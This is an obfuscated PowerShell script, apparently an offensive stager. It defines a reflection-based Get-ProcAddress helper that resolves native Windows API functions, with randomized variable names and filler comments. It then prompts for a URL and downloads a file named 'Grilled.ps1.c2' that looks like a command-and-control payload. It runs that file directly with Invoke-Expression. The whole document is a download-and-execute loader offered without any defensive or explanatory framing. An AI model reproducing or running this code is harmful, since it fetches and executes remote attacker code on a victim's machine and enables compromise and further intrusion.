function Get-ProcAddress {
    Param(
        [Parameter(Position = 0, Mandatory = $True)] [String] $XiaJbYBbeKKyvkpFzmIYAdCEM,
        [Parameter(Position = 1, Mandatory = $True)] [String] $WDudwfJnvToNmDRVetakqFeAMEAj
    )

    # Microsoft".
    $BXOTMmgznZOWIWutzvIWsmZpJmfdaFnQqtDeg = [AppDomain]::CurrentDomain.GetAssemblies() |
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
    $afEjWqvaYiKBMoouISlarrLWrQAKRSQIHqqG = $BXOTMmgznZOWIWutzvIWsmZpJmfdaFnQqtDeg.GetType('Microsoft.Win32.UnsafeNativeMethods')
    # Microsoft".
    $ekCFXGSUTGJqECsaYeCnuduih = $afEjWqvaYiKBMoouISlarrLWrQAKRSQIHqqG.GetMethod('GetModuleHandle')
    $XroQnIFydYvgMrOINGXevDvJdrvQomyFSUHZDdL = $afEjWqvaYiKBMoouISlarrLWrQAKRSQIHqqG.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
    # Microsoft".
    $wqOTykoTvZtofFduihBsyUDLfZbSWfETIohGqYKhIqNi = $ekCFXGSUTGJqECsaYeCnuduih.Invoke($null, @($XiaJbYBbeKKyvkpFzmIYAdCEM))
    $NHYfoTpMPmwtRSuxsyGttXkFigDCTgISaUhhwl = New-Object IntPtr
    $rKjcZefFNJcXgIKBMvPVvjBlVrLBZgSQrGuujP = New-Object System.Runtime.InteropServices.HandleRef($NHYfoTpMPmwtRSuxsyGttXkFigDCTgISaUhhwl, $wqOTykoTvZtofFduihBsyUDLfZbSWfETIohGqYKhIqNi)
    # Microsoft".
    return $XroQnIFydYvgMrOINGXevDvJdrvQomyFSUHZDdL.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$rKjcZefFNJcXgIKBMvPVvjBlVrLBZgSQrGuujP, $WDudwfJnvToNmDRVetakqFeAMEAj))
}
[string]::IsNullOrEmpty($prefixpath) -and ($prefixpath = Read-Host "Specify prefixpathUrl")
$wbc = New-Object System.Net.WebClient
$wbc.Encoding = [System.Text.Encoding]::UTF8
$wbc.DownloadString("$prefixpath/Grilled.ps1.c2") | iex
